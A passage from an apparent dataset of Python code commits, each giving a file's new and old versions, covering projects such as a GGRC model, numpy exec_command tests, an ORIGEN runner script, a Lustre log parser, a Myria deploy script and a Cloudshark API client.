Relatable, BusinessObject, db.Model):
__tablename__ = 'control_assessments'
design = deferred(db.Column(db.String), 'ControlAssessment')
operationally = deferred(db.Column(db.String), 'ControlAssessment')
control_id = db.Column(db.Integer, db.ForeignKey('controls.id'))
control = db.relationship('Control', foreign_keys=[control_id])
audit = {} # we add this for the sake of client side error checking
# REST properties
_publish_attrs = [
'design',
'operationally',
'control',
PublishOnly('audit')
]
track_state_for_class(ControlAssessment)
| # Copyright (C) 2015 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: anze@reciprocitylabs.com
# Maintained By: anze@reciprocitylabs.com
from ggrc import db
from .mixins import (
deferred, BusinessObject, Timeboxed, CustomAttributable, TestPlanned
)
from .object_document import Documentable
from .object_owner import Ownable
from .object_person import Personable
from .relationship import Relatable
from .track_object_state import HasObjectState, track_state_for_class
from ggrc.models.reflection import PublishOnly
class ControlAssessment(HasObjectState, TestPlanned, CustomAttributable,
Documentable, Personable, Timeboxed, Ownable,
Relatable, BusinessObject, db.Model):
__tablename__ = 'control_assessments'
design = deferred(db.Column(db.String), 'ControlAssessment')
operationally = deferred(db.Column(db.String), 'ControlAssessment')
control_id = db.Column(db.Integer, db.ForeignKey('controls.id'))
control = db.relationship('Control', foreign_keys=[control_id])
# REST properties
_publish_attrs = [
'design',
'operationally',
'control'
]
track_state_for_class(ControlAssessment)
| Python | 0 |
e7d9a67611b2dc443c1f2bc23506323837d79bda | fix test_mcp | numerics/swig/tests/test_mcp.py | numerics/swig/tests/test_mcp.py | # Copyright (C) 2005, 2012 by INRIA
#!/usr/bin/env python
import numpy as np
import siconos.numerics as N
def mcp_function(z):
M = np.array([[2., 1.],
[1., 2.]])
q = np.array([-5., -6.])
return np.dot(M,z) + q
def mcp_Nablafunction(z):
M = np.array([[2., 1.],
[1., 2.]])
return M
# solution
zsol = np.array([4./3., 7./3.])
wsol = np.array([0. , 0.])
# problem
#mcp=N.MCP(1,1,mcp_function,mcp_Nablafunction)
ztol = 1e-8
def test_new():
mcp=N.MCP(1, 1, mcp_function, mcp_Nablafunction)
def test_mcp_FB():
mcp=N.MCP(1,1,mcp_function,mcp_Nablafunction)
z = np.array([0., 0.])
w = np.array([0., 0.])
SO=N.SolverOptions(mcp,N.SICONOS_MCP_FB)
N.mcp_driver_init(mcp, SO)
info = N.mcp_FischerBurmeister(mcp, z, w, SO)
N.mcp_driver_reset(mcp, SO)
print("z = ", z)
print("w = ", w)
assert (np.linalg.norm(z-zsol) <= ztol)
assert not info
| # Copyright (C) 2005, 2012 by INRIA
#!/usr/bin/env python
import numpy as np
import siconos.numerics as N
def mcp_function (z) :
M = np.array([[2., 1.],
[1., 2.]])
q = np.array([-5., -6.])
return dot(M,z) + q
def mcp_Nablafunction (z) :
M = np.array([[2., 1.],
[1., 2.]])
return M
# solution
zsol = np.array([4./3., 7./3.])
wsol = np.array([0. , 0.])
# problem
#mcp=N.MCP(1,1,mcp_function,mcp_Nablafunction)
ztol = 1e-8
def test_new():
mcp=N.MCP(1,1,mcp_function,mcp_Nablafunction)
def test_mcp_FB():
mcp=N.MCP(1,1,mcp_function,mcp_Nablafunction)
z = np.array([0., 0.])
w = np.array([0., 0.])
SO=N.SolverOptions(mcp,N.SICONOS_MCP_FB)
N.mcp_driver_init(mcp, SO)
info = N.mcp_FischerBurmeister(mcp, z, w, SO)
N.mcp_driver_reset(mcp, SO)
#print("z = ", z)
#print("w = ", w)
assert (np.linalg.norm(z-zsol) <= ztol)
assert not info
| Python | 0.00002 |
2fbdd9903fc9bf6e1fe797e92c0157abd67850ce | add robust tests for exec_command() | numpy/distutils/tests/test_exec_command.py | numpy/distutils/tests/test_exec_command.py | import os
import sys
import StringIO
from numpy.distutils import exec_command
class redirect_stdout(object):
"""Context manager to redirect stdout for exec_command test."""
def __init__(self, stdout=None):
self._stdout = stdout or sys.stdout
def __enter__(self):
self.old_stdout = sys.stdout
sys.stdout = self._stdout
def __exit__(self, exc_type, exc_value, traceback):
self._stdout.flush()
sys.stdout = self.old_stdout
class redirect_stderr(object):
"""Context manager to redirect stderr for exec_command test."""
def __init__(self, stderr=None):
self._stderr = stderr or sys.stderr
def __enter__(self):
self.old_stderr = sys.stderr
sys.stderr = self._stderr
def __exit__(self, exc_type, exc_value, traceback):
self._stderr.flush()
sys.stderr = self.old_stderr
class emulate_nonposix(object):
"""Context manager to emulate os.name != 'posix' """
def __init__(self, osname='non-posix'):
self._new_name = osname
def __enter__(self):
self._old_name = os.name
os.name = self._new_name
def __exit__(self, exc_type, exc_value, traceback):
os.name = self._old_name
def test_exec_command_stdout():
# Regression test for gh-2999 and gh-2915.
# There are several packages (nose, scipy.weave.inline, Sage inline
# Fortran) that replace stdout, in which case it doesn't have a fileno
# method. This is tested here, with a do-nothing command that fails if the
# presence of fileno() is assumed in exec_command.
# Test posix version:
with redirect_stdout(StringIO.StringIO()):
exec_command.exec_command("cd '.'")
# Test non-posix version:
with emulate_nonposix():
with redirect_stdout(StringIO.StringIO()):
exec_command.exec_command("cd '.'")
def test_exec_command_stderr():
# Test posix version:
with redirect_stderr(StringIO.StringIO()):
exec_command.exec_command("cd '.'")
# Test non-posix version:
# Note: this test reveals a failure
#with emulate_nonposix():
# with redirect_stderr(StringIO.StringIO()):
# exec_command.exec_command("cd '.'")
| import sys
import StringIO
from numpy.distutils import exec_command
class redirect_stdout(object):
"""Context manager to redirect stdout for exec_command test."""
def __init__(self, stdout=None):
self._stdout = stdout or sys.stdout
def __enter__(self):
self.old_stdout = sys.stdout
sys.stdout = self._stdout
def __exit__(self, exc_type, exc_value, traceback):
self._stdout.flush()
sys.stdout = self.old_stdout
def test_exec_command():
# Regression test for gh-2999 and gh-2915.
# There are several packages (nose, scipy.weave.inline, Sage inline
# Fortran) that replace stdout, in which case it doesn't have a fileno
# method. This is tested here, with a do-nothing command that fails if the
# presence of fileno() is assumed in exec_command.
with redirect_stdout(StringIO.StringIO()):
exec_command.exec_command("cd '.'")
| Python | 0.000001 |
7138cd2fb7a5dc8a5044f15b19d3d53a1486dec3 | order by companies by name, helps when viewing adding companies to jobs entry form | companies/models.py | companies/models.py | from django.conf import settings
from django.db import models
from django.utils.translation import ugettext_lazy as _
from markupfield.fields import MarkupField
from cms.models import NameSlugModel
DEFAULT_MARKUP_TYPE = getattr(settings, 'DEFAULT_MARKUP_TYPE', 'restructuredtext')
class Company(NameSlugModel):
about = MarkupField(blank=True, default_markup_type=DEFAULT_MARKUP_TYPE)
contact = models.CharField(null=True, blank=True, max_length=100)
email = models.EmailField(null=True, blank=True)
url = models.URLField('URL', null=True, blank=True)
logo = models.ImageField(upload_to='companies/logos/', blank=True, null=True)
class Meta:
verbose_name = _('company')
verbose_name_plural = _('companies')
ordering = ('name', )
| from django.conf import settings
from django.db import models
from django.utils.translation import ugettext_lazy as _
from markupfield.fields import MarkupField
from cms.models import NameSlugModel
DEFAULT_MARKUP_TYPE = getattr(settings, 'DEFAULT_MARKUP_TYPE', 'restructuredtext')
class Company(NameSlugModel):
about = MarkupField(blank=True, default_markup_type=DEFAULT_MARKUP_TYPE)
contact = models.CharField(null=True, blank=True, max_length=100)
email = models.EmailField(null=True, blank=True)
url = models.URLField('URL', null=True, blank=True)
logo = models.ImageField(upload_to='companies/logos/', blank=True, null=True)
class Meta:
verbose_name = _('company')
verbose_name_plural = _('companies')
| Python | 0 |
f283dc1f710c8eca452d39f63f5b3b956e5676c8 | Fix the xs-tape9 option | transmutagen/origen.py | transmutagen/origen.py | import argparse
import os
from subprocess import run
from pyne.utils import toggle_warnings
import warnings
toggle_warnings()
warnings.simplefilter('ignore')
from pyne.origen22 import (nlbs, write_tape5_irradiation, write_tape4,
parse_tape9, merge_tape9, write_tape9, parse_tape6)
from pyne.material import from_atom_frac
ORIGEN = '/home/origen22/code/o2_therm_linux.exe'
decay_TAPE9 = "/home/origen22/libs/decay.lib"
LIBS_DIR = "/home/origen22/libs"
def make_parser():
p = argparse.ArgumentParser('origen', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
p.add_argument('xs_tape9', metavar='xs-tape9', help="""path to the cross section TAPE9 file. If
the path is not absolute, defaults to looking in {LIBS_DIR}""".format(LIBS_DIR=LIBS_DIR))
p.add_argument('time', help='the time in sec',
type=float)
p.add_argument('--phi', help='the neutron flux in [n/cm^2/sec]',
type=float, default=4e14)
p.add_argument('--decay-tape9', help="path to the decay TAPE9 file.",
default=decay_TAPE9)
p.add_argument('--origen', help="Path to the origen executable",
default=ORIGEN)
return p
def main():
p = make_parser()
try:
import argcomplete
argcomplete.autocomplete(p)
except ImportError:
pass
args = p.parse_args()
xs_tape9 = args.xs_tape9
if not os.path.isabs(xs_tape9):
xs_tape9 = os.path.join(LIBS_DIR, xs_tape9)
time = args.time
phi = args.phi
decay_tape9 = args.decay_tape9
origen = args.origen
parsed_xs_tape9 = parse_tape9(xs_tape9)
parsed_decay_tape9 = parse_tape9(decay_tape9)
merged_tape9 = merge_tape9([parsed_decay_tape9, parsed_xs_tape9])
# Can set outfile to change directory, but the file name needs to be
# TAPE9.INP.
write_tape9(merged_tape9)
decay_nlb, xsfpy_nlb = nlbs(parsed_xs_tape9)
# Can set outfile, but the file name should be called TAPE5.INP.
write_tape5_irradiation("IRF", time/(60*60*24), phi,
xsfpy_nlb=xsfpy_nlb, cut_off=0, out_table_num=[4],
out_table_nes=[True, False, False])
M = from_atom_frac({"U235": 1}, mass=1, atoms_per_molecule=1)
write_tape4(M)
run(origen)
data = parse_tape6()
print(data)
filename = "{library} {time} {phi}.py".format(
library=os.path.basename(xs_tape9),
time=time,
phi=phi,
)
with open('/data/' + filename, 'w') as f:
f.write(repr(data))
print("Writing data to data/" + filename)
if __name__ == '__main__':
main()
| import argparse
import os
from subprocess import run
from pyne.utils import toggle_warnings
import warnings
toggle_warnings()
warnings.simplefilter('ignore')
from pyne.origen22 import (nlbs, write_tape5_irradiation, write_tape4,
parse_tape9, merge_tape9, write_tape9, parse_tape6)
from pyne.material import from_atom_frac
ORIGEN = '/home/origen22/code/o2_therm_linux.exe'
decay_TAPE9 = "/home/origen22/libs/decay.lib"
LIBS_DIR = "/home/origen22/libs"
def make_parser():
p = argparse.ArgumentParser('origen', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
p.add_argument('xs-tape9', dest='xs_tape9', help="""path to the cross section TAPE9 file. If
the path is not absolute, defaults to looking in {LIBS_DIR}""".format(LIBS_DIR=LIBS_DIR))
p.add_argument('time', help='the time in sec',
type=float)
p.add_argument('--phi', help='the neutron flux in [n/cm^2/sec]',
type=float, default=4e14)
p.add_argument('--decay-tape9', help="path to the decay TAPE9 file.",
default=decay_TAPE9)
p.add_argument('--origen', help="Path to the origen executable",
default=ORIGEN)
return p
def main():
p = make_parser()
try:
import argcomplete
argcomplete.autocomplete(p)
except ImportError:
pass
args = p.parse_args()
xs_tape9 = args.xs_tape9
if not os.path.isabs(xs_tape9):
xs_tape9 = os.path.join(LIBS_DIR, xs_tape9)
time = args.time
phi = args.phi
decay_tape9 = args.decay_tape9
origen = args.origen
parsed_xs_tape9 = parse_tape9(xs_tape9)
parsed_decay_tape9 = parse_tape9(decay_tape9)
merged_tape9 = merge_tape9([parsed_decay_tape9, parsed_xs_tape9])
# Can set outfile to change directory, but the file name needs to be
# TAPE9.INP.
write_tape9(merged_tape9)
decay_nlb, xsfpy_nlb = nlbs(parsed_xs_tape9)
# Can set outfile, but the file name should be called TAPE5.INP.
write_tape5_irradiation("IRF", time/(60*60*24), phi,
xsfpy_nlb=xsfpy_nlb, cut_off=0, out_table_num=[4],
out_table_nes=[True, False, False])
M = from_atom_frac({"U235": 1}, mass=1, atoms_per_molecule=1)
write_tape4(M)
run(origen)
data = parse_tape6()
print(data)
filename = "{library} {time} {phi}.py".format(
library=os.path.basename(xs_tape9),
time=time,
phi=phi,
)
with open('/data/' + filename, 'w') as f:
f.write(repr(data))
print("Writing data to data/" + filename)
if __name__ == '__main__':
main()
| Python | 0.999998 |
10e7388eec8d16f5a69e5d4f3b9e6cf56a1c956e | Remove explicit byte string from migration 0003 (#298) | silk/migrations/0003_request_prof_file.py | silk/migrations/0003_request_prof_file.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-08 18:23
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('silk', '0002_auto_update_uuid4_id_field'),
]
operations = [
migrations.AddField(
model_name='request',
name='prof_file',
field=models.FileField(null=True, upload_to=''),
),
]
| # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-08 18:23
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('silk', '0002_auto_update_uuid4_id_field'),
]
operations = [
migrations.AddField(
model_name='request',
name='prof_file',
field=models.FileField(null=True, upload_to=b''),
),
]
| Python | 0.000004 |
30452b9fe815a2b68826b739625d1c06886fb17e | Remove redundant isinstance() check | pact/group.py | pact/group.py | import itertools
from .base import PactBase
class PactGroup(PactBase):
def __init__(self, pacts=None, lazy=True):
if pacts is None:
pacts = []
self._pacts = list(pacts)
self._finished_pacts = []
self._is_lazy = lazy
super(PactGroup, self).__init__()
def __iadd__(self, other):
self.add(other)
return self
def __iter__(self):
return itertools.chain(self._pacts, self._finished_pacts)
def add(self, pact, absorb=False):
if absorb and isinstance(pact, PactGroup):
raise NotImplementedError('Absorbing groups is not supported') # pragma: no cover
self._pacts.append(pact)
if absorb:
# pylint: disable=protected-access
while pact._then:
# then might throw, so we attempt it first
self.then(pact._then[0])
pact._then.pop(0)
def _is_finished(self):
has_finished = True
indexes_to_remove = []
for index, pact in enumerate(self._pacts):
if pact.poll():
indexes_to_remove.append(index)
else:
has_finished = False
if self._is_lazy:
break
for index in reversed(indexes_to_remove):
self._finished_pacts.append(self._pacts.pop(index))
return has_finished
def __repr__(self):
return repr(list(self._pacts))
| import itertools
from .base import PactBase
class PactGroup(PactBase):
def __init__(self, pacts=None, lazy=True):
if pacts is None:
pacts = []
self._pacts = list(pacts)
self._finished_pacts = []
self._is_lazy = lazy
super(PactGroup, self).__init__()
def __iadd__(self, other):
self.add(other)
return self
def __iter__(self):
return itertools.chain(self._pacts, self._finished_pacts)
def add(self, pact, absorb=False):
if absorb and isinstance(pact, PactGroup):
if isinstance(pact, PactGroup):
raise NotImplementedError('Absorbing groups is not supported') # pragma: no cover
self._pacts.append(pact)
if absorb:
# pylint: disable=protected-access
while pact._then:
# then might throw, so we attempt it first
self.then(pact._then[0])
pact._then.pop(0)
def _is_finished(self):
has_finished = True
indexes_to_remove = []
for index, pact in enumerate(self._pacts):
if pact.poll():
indexes_to_remove.append(index)
else:
has_finished = False
if self._is_lazy:
break
for index in reversed(indexes_to_remove):
self._finished_pacts.append(self._pacts.pop(index))
return has_finished
def __repr__(self):
return repr(list(self._pacts))
| Python | 0.000015 |
1b3657adf92b52d731fd0d9248f517a0cee58019 | Compute the difference with the previous timestamp | src/remora_parse_fs.py | src/remora_parse_fs.py | #!/usr/bin/env python
#
#========================================================================
# HEADER
#========================================================================
#% DESCRIPTION
#% remora_parse_fs
#%
#% DO NOT call this script directory. This is a postprocessing
#% tool called by REMORA
#%
#========================================================================
#- IMPLEMENTATION
#- version REMORA 1.4
#- authors Carlos Rosales (carlos@tacc.utexas.edu)
#- Antonio Gomez (agomez@tacc.utexas.edu)
#- license MIT
#
#========================================================================
# HISTORY
# 2015/12/15: Doesn't use xltop. Instead, Remora creates a file
# for each node with the filesystem load
# 2015/09/09: Python implementation, handles heterogeneous file
# system entries in xltop.txt correctly
# 2015/08/12: Initial version
#========================================================================
import glob
import sys
from collections import defaultdict
if (len(sys.argv) != 2):
print "Error: invalid number of parameters"
print "This script needs the name of a folder as argument"
sys.exit()
initialized=False
results=defaultdict(list)
header=list()
for filename in glob.iglob(sys.argv[1]+'/lustre_*'):
with open(filename) as f:
idx = 0
for line in f:
idx += 1
if "TIMESTAMP" in line:
#Only process the first line for the firs file that
#is processed
#This is how we collect the different filesystems in
#the sytem
if initialized:
continue
initialized = True
parts = line.split()
for i in parts:
#We don't need the TIMESTAMP name
if "TIMESTAMP" in i:
continue
#Everything that it's not TIMESTAMP in the first
#line of the first file, is a filesystem. We append
#all the filesystems into the header list
header.append(i)
continue
parts = line.split()
idx2=0
#We now process each line. We have to skip the first
#column (the timestamp)
for i in parts:
if (idx2==0):
idx2 += 1
continue
#Now, add or append each value read to the appropriate
#item in a list. 'results' is a dictionary, where the key
#is the name of the filesystem (that's why use 'header[i]'
#to access each element of the dictionary) and the elements
#are lists
if ((idx-2)>=len(results[header[idx2-1]])):
results[header[idx2-1]].append(int(i))
else:
results[header[idx2-1]][idx-2] += int(i)
idx2 += 1
#Now we simply format the matrix for a pretty output
out_header=""
numvals=0
max_load=list()
for i in results:
out_header = out_header + i + " "
numvals=len(results[i])
temp_max=0
for j in xrange(numvals):
if results[i][j] > temp_max:
temp_max = results[i][j]
max_load.append(temp_max)
fout = open(sys.argv[1]+"/fs_lustre_total.txt", "w")
fout.write(out_header+"\n")
for j in xrange(numvals):
out_vals = ""
for i in results:
if (j==0):
out_vals = out_vals + " 0 "
else:
out_vals = out_vals + str(results[i][j]-results[i][j-1]) + " "
fout.write(out_vals +"\n")
fout.close()
idx=0
for i in results:
print "REMORA: MAX load in %10s: %10d" % (i, max_load[idx])
idx += 1
| #!/usr/bin/env python
#
#========================================================================
# HEADER
#========================================================================
#% DESCRIPTION
#% remora_parse_fs
#%
#% DO NOT call this script directory. This is a postprocessing
#% tool called by REMORA
#%
#========================================================================
#- IMPLEMENTATION
#- version REMORA 1.4
#- authors Carlos Rosales (carlos@tacc.utexas.edu)
#- Antonio Gomez (agomez@tacc.utexas.edu)
#- license MIT
#
#========================================================================
# HISTORY
# 2015/12/15: Doesn't use xltop. Instead, Remora creates a file
# for each node with the filesystem load
# 2015/09/09: Python implementation, handles heterogeneous file
# system entries in xltop.txt correctly
# 2015/08/12: Initial version
#========================================================================
import glob
import sys
from collections import defaultdict
if (len(sys.argv) != 2):
print "Error: invalid number of parameters"
print "This script needs the name of a folder as argument"
sys.exit()
initialized=False
results=defaultdict(list)
header=list()
for filename in glob.iglob(sys.argv[1]+'/lustre_*'):
with open(filename) as f:
idx = 0
for line in f:
idx += 1
if "TIMESTAMP" in line:
#Only process the first line for the firs file that
#is processed
#This is how we collect the different filesystems in
#the sytem
if initialized:
continue
initialized = True
parts = line.split()
for i in parts:
#We don't need the TIMESTAMP name
if "TIMESTAMP" in i:
continue
#Everything that it's not TIMESTAMP in the first
#line of the first file, is a filesystem. We append
#all the filesystems into the header list
header.append(i)
continue
parts = line.split()
idx2=0
#We now process each line. We have to skip the first
#column (the timestamp)
for i in parts:
if (idx2==0):
idx2 += 1
continue
#Now, add or append each value read to the appropriate
#item in a list. 'results' is a dictionary, where the key
#is the name of the filesystem (that's why use 'header[i]'
#to access each element of the dictionary) and the elements
#are lists
if ((idx-2)>=len(results[header[idx2-1]])):
results[header[idx2-1]].append(int(i))
else:
results[header[idx2-1]][idx-2] += int(i)
idx2 += 1
#Now we simply format the matrix for a pretty output
out_header=""
numvals=0
max_load=list()
for i in results:
out_header = out_header + i + " "
numvals=len(results[i])
temp_max=0
for j in xrange(numvals):
if results[i][j] > temp_max:
temp_max = results[i][j]
max_load.append(temp_max)
fout = open(sys.argv[1]+"/fs_lustre_total.txt", "w")
fout.write(out_header+"\n")
for j in xrange(numvals):
out_vals = ""
for i in results:
out_vals = out_vals + str(results[i][j]) + " "
fout.write(out_vals +"\n")
fout.close()
idx=0
for i in results:
print "REMORA: MAX load in %10s: %10d" % (i, max_load[idx])
idx += 1
| Python | 1 |
7dc9085bf0665efc3083b64c0b34cb7c8c92ae31 | update now drops duplicates | dblib/dbUpdate.py | dblib/dbUpdate.py | import pymongo
import multiprocessing
import multiprocessing.connection
import time
SIZE = 128
NUM_NODES = 3
def recv_data(sock,dataQueue,cQueue):
connect = sock.accept()
cQueue.put("listen")
data = connect.recv()
dataQueue.put(data)
connect.close()
print("received data")
exit(0)
def db_send(database,queue):
collection = database.times
t = int(time.time())
doc = int(t/600)
for i in range(queue.qsize()):
data = queue.get()
data = data.split(',')
for j in range(0,len(data)-3,4):
new_posts = {}
new_posts.update({'data':{"mac":data[j+3],'node':int(data[0]),'time':int(data[j+1]),'sigstr':int(data[j+2])}})
collection.update({'_id':doc},{"$addToSet":new_posts},upsert=True)
## dic = {'node':temp[0],'time':temp[1],'sigstr':temp[2],'mac':temp[3]}
## new_posts.append(dic)
## posts.insert_many(new_posts)
print("sent")
exit(0)
def server(host,port):
client = pymongo.MongoClient()
db = client.cheddar
sock = multiprocessing.connection.Listener((host,port))
dq = multiprocessing.Queue()
cq = multiprocessing.Queue()
cq.put("listen")
while True:
try:
task = cq.get(True,1)
except:
task = "none"
if task == "listen":
print("spawning listening thread")
p = multiprocessing.Process(target=recv_data, args=(sock,dq,cq))
p.start()
## if (dq.qsize() == 100):
if dq.qsize() != 0:
print("spawning sending thread")
p = multiprocessing.Process(target=db_send,args=(db,dq))
p.start()
## pass
server('',10000)
| import pymongo
import multiprocessing
import multiprocessing.connection
import time
SIZE = 128
NUM_NODES = 3
def recv_data(sock,dataQueue,cQueue):
connect = sock.accept()
cQueue.put("listen")
data = connect.recv()
dataQueue.put(data)
connect.close()
print("received data")
exit(0)
def db_send(database,queue):
collection = database.times
t = int(time.time())
doc = int(t/600)
for i in range(queue.qsize()):
data = queue.get()
data = data.split(',')
for j in range(0,len(data)-3,4):
new_posts = {}
new_posts.update({'data':{"mac":data[j+3],'node':int(data[0]),'time':int(data[j+1]),'sigstr':int(data[j+2])}})
collection.update({'_id':doc},{"$push":new_posts},upsert=True)
## dic = {'node':temp[0],'time':temp[1],'sigstr':temp[2],'mac':temp[3]}
## new_posts.append(dic)
## posts.insert_many(new_posts)
print("sent")
exit(0)
def server(host,port):
client = pymongo.MongoClient()
db = client.cheddar
sock = multiprocessing.connection.Listener((host,port))
dq = multiprocessing.Queue()
cq = multiprocessing.Queue()
cq.put("listen")
while True:
try:
task = cq.get(True,1)
except:
task = "none"
if task == "listen":
print("spawning listening thread")
p = multiprocessing.Process(target=recv_data, args=(sock,dq,cq))
p.start()
## if (dq.qsize() == 100):
if dq.qsize() != 0:
print("spawning sending thread")
p = multiprocessing.Process(target=db_send,args=(db,dq))
p.start()
## pass
server('',10000)
| Python | 0 |
e76d6ad7a4670bfa47ba506343aff2e5f118f976 | fix rsync options for use in shared scenarios | myriadeploy/update_myria_jar_only.py | myriadeploy/update_myria_jar_only.py | #!/usr/bin/env python
import myriadeploy
import subprocess
import sys
def host_port_list(workers):
return [str(worker[0]) + ':' + str(worker[1]) for worker in workers]
def get_host_port_path(node, default_path):
if len(node) == 2:
(hostname, port) = node
if default_path is None:
raise Exception("Path not specified for node %s" % str(node))
else:
path = default_path
else:
(hostname, port, path) = node
return (hostname, port, path)
def copy_distribution(config):
"Copy the distribution (jar and libs and conf) to compute nodes."
nodes = config['nodes']
description = config['description']
default_path = config['path']
username = config['username']
for node in nodes:
(hostname, _, path) = get_host_port_path(node, default_path)
if hostname != 'localhost':
remote_path = "%s@%s:%s/%s-files" % (username, hostname, path, description)
else:
remote_path = "%s/%s-files" % (path, description)
to_copy = ["libs", "conf"]
args = ["rsync", "--del", "-rlDLvz"] + to_copy + [remote_path]
if subprocess.call(args):
raise Exception("Error copying distribution to %s" % (hostname,))
def main(argv):
# Usage
if len(argv) != 2:
print >> sys.stderr, "Usage: %s <deployment.cfg>" % (argv[0])
print >> sys.stderr, " deployment.cfg: a configuration file modeled after deployment.cfg.sample"
sys.exit(1)
config = myriadeploy.read_config_file(argv[1])
# Step 1: Copy over libs, "conf", myria
copy_distribution(config)
if __name__ == "__main__":
main(sys.argv)
| #!/usr/bin/env python
import myriadeploy
import subprocess
import sys
def host_port_list(workers):
return [str(worker[0]) + ':' + str(worker[1]) for worker in workers]
def get_host_port_path(node, default_path):
if len(node) == 2:
(hostname, port) = node
if default_path is None:
raise Exception("Path not specified for node %s" % str(node))
else:
path = default_path
else:
(hostname, port, path) = node
return (hostname, port, path)
def copy_distribution(config):
"Copy the distribution (jar and libs and conf) to compute nodes."
nodes = config['nodes']
description = config['description']
default_path = config['path']
username = config['username']
for node in nodes:
(hostname, _, path) = get_host_port_path(node, default_path)
if hostname != 'localhost':
remote_path = "%s@%s:%s/%s-files" % (username, hostname, path, description)
else:
remote_path = "%s/%s-files" % (path, description)
to_copy = ["libs", "conf"]
args = ["rsync", "--del", "-aLvz"] + to_copy + [remote_path]
if subprocess.call(args):
raise Exception("Error copying distribution to %s" % (hostname,))
def main(argv):
# Usage
if len(argv) != 2:
print >> sys.stderr, "Usage: %s <deployment.cfg>" % (argv[0])
print >> sys.stderr, " deployment.cfg: a configuration file modeled after deployment.cfg.sample"
sys.exit(1)
config = myriadeploy.read_config_file(argv[1])
# Step 1: Copy over libs, "conf", myria
copy_distribution(config)
if __name__ == "__main__":
main(sys.argv)
| Python | 0 |
afbef65bd28f0058edf39579125e2ccb35a72aee | Update test_multivariate.py to Python 3.4 | nb_twitter/test/test_multivariate.py | nb_twitter/test/test_multivariate.py | # -*- coding: utf-8 -*-
# test_multivariate.py
# nb_twitter/nb_twitter/bayes
#
# Created by Thomas Nelson <tn90ca@gmail.com>
# Preston Engstrom <pe12nh@brocku.ca>
# Created..........................2015-06-29
# Modified.........................2015-06-30
#
# This script was developed for use as part of the nb_twitter package
from nb_twitter.bayes import multivariate
train_class = ['c', 'j']
train_docs = [['c', 'chinese beijing chinese'],
['c', 'chinese chinese shanghai'],
['c', 'chinese macao'],
['j', 'tokyo japan chinese']]
test_docs = 'chinese chinese chinese tokyo japan'
classifier = multivariate.Multivariate(train_class, train_docs)
classifier.train()
results = classifier.run(test_docs)
print("C\t\t=", classifier.C)
print("D\t\t=", classifier.D)
print("N\t\t=", classifier.N)
print("V\t\t=", classifier.V)
print("Nc\t\t=", classifier.Nc)
print("Prior\t=", classifier.prior)
print("Prob\t=", classifier.prob)
print
print(results)
| # -*- coding: utf-8 -*-
# test_multivariate.py
# nb_twitter/nb_twitter/bayes
#
# Created by Thomas Nelson <tn90ca@gmail.com>
# Preston Engstrom <pe12nh@brocku.ca>
# Created..........................2015-06-29
# Modified.........................2015-06-29
#
# This script was developed for use as part of the nb_twitter package
from nb_twitter.bayes import multivariate
train_class = ['c', 'j']
train_docs = [['c', 'chinese beijing chinese'],
['c', 'chinese chinese shanghai'],
['c', 'chinese macao'],
['j', 'tokyo japan chinese']]
test_docs = 'chinese chinese chinese tokyo japan'
classifier = multivariate.Multivariate(train_class, train_docs)
classifier.train()
results = classifier.run(test_docs)
print "C\t\t=", classifier.C
print "D\t\t=", classifier.D
print "N\t\t=", classifier.N
print "V\t\t=", classifier.V
print "Nc\t\t=", classifier.Nc
print "Prior\t=", classifier.prior
print "Prob\t=", classifier.prob
print
print(results) | Python | 0.000009 |
45b0af75824c1f7715c464ae2dfc35ac8d7a9767 | Add additional_tags parameter to upload and pass through client args to httplib2. | cloudshark/cloudshark.py | cloudshark/cloudshark.py |
import httplib2
import io
import json
import os
import urllib
class CloudsharkError(Exception):
def __init__(self, msg, error_code=None):
self.msg = msg
self.error_code = error_code
def __str__(self):
return repr('%s: %s' % (self.error_code, self.msg))
class Cloudshark(object):
def __init__(self,url,token,client_args={}):
self.url = url
self.token = token
self.client_args = client_args
def get_info(self,id):
"""Get the info about a particular capture by id."""
url = '%s/api/v1/%s/info/%s' % (self.url,self.token,id)
http = httplib2.Http(**self.client_args)
(response,content) = http.request(url,method='GET')
http_status = response.get('status')
if http_status != '200':
print(response)
raise CloudsharkError('Error retrieving: %s'%url,http_status)
return json.loads(content)
def search_by_file_name(self,file_name):
"""Search for a capture by file name."""
url = '%s/api/v1/%s/search?search[filename]=%s' % (self.url,self.token,urllib.quote(file_name))
http = httplib2.Http(**self.client_args)
(response,content) = http.request(url,method='GET')
http_status = response.get('status')
if http_status != '200':
print(response)
raise CloudsharkError('Error retrieving: %s'%url,http_status)
return json.loads(content)
def upload(self,file_object,file_name=None,additional_tags=None,comments=None):
"""Upload a capture file to Cloudshark."""
url = '%s/api/v1/%s/upload' % (self.url,self.token)
BOUNDARY = "LANDSHARKCLOUDSHARK"
headers = {}
headers['Content-Type'] = 'multipart/form-data; boundary=%s' % BOUNDARY
if file_name is None:
file_name = os.path.basename(file_object.name)
file_content = file_object.read()
body_lines = ['--' + BOUNDARY,
'Content-Disposition: form-data; name="file"; filename="%s"' % file_name,
'Content-Type: application/octet-stream',
'',
file_content]
if additional_tags is not None:
body_lines += ['--' + BOUNDARY,
'Content-Disposition: form-data; name="additional_tags"',
'Content-Type: text/plain',
'',
','.join(additional_tags)]
if comments is not None:
body_lines += ['--' + BOUNDARY,
'Content-Disposition: form-data; name="comments"',
'Content-Type: text/plain',
'',
comments]
body_lines += ['--' + BOUNDARY + '--',
'']
b = io.BytesIO()
for body_line in body_lines:
if isinstance(body_line,unicode):
b.write(body_line.encode('utf-8'))
else:
b.write(body_line)
b.write(b'\r\n')
body = b.getvalue()
http = httplib2.Http(**self.client_args)
(response,content) = http.request(url,method='POST',body=body,headers=headers)
http_status = response.get('status')
if http_status != '200':
print(response)
raise CloudsharkError('Error retrieving: %s'%url,http_status)
# content is a dict with "id" and "filename" entries.
return json.loads(content)
|
import httplib2
import io
import json
import os
import urllib
class CloudsharkError(Exception):
def __init__(self, msg, error_code=None):
self.msg = msg
self.error_code = error_code
def __str__(self):
return repr('%s: %s' % (self.error_code, self.msg))
class Cloudshark(object):
def __init__(self,url,token):
self.url = url
self.token = token
def get_info(self,id):
"""Get the info about a particular capture by id."""
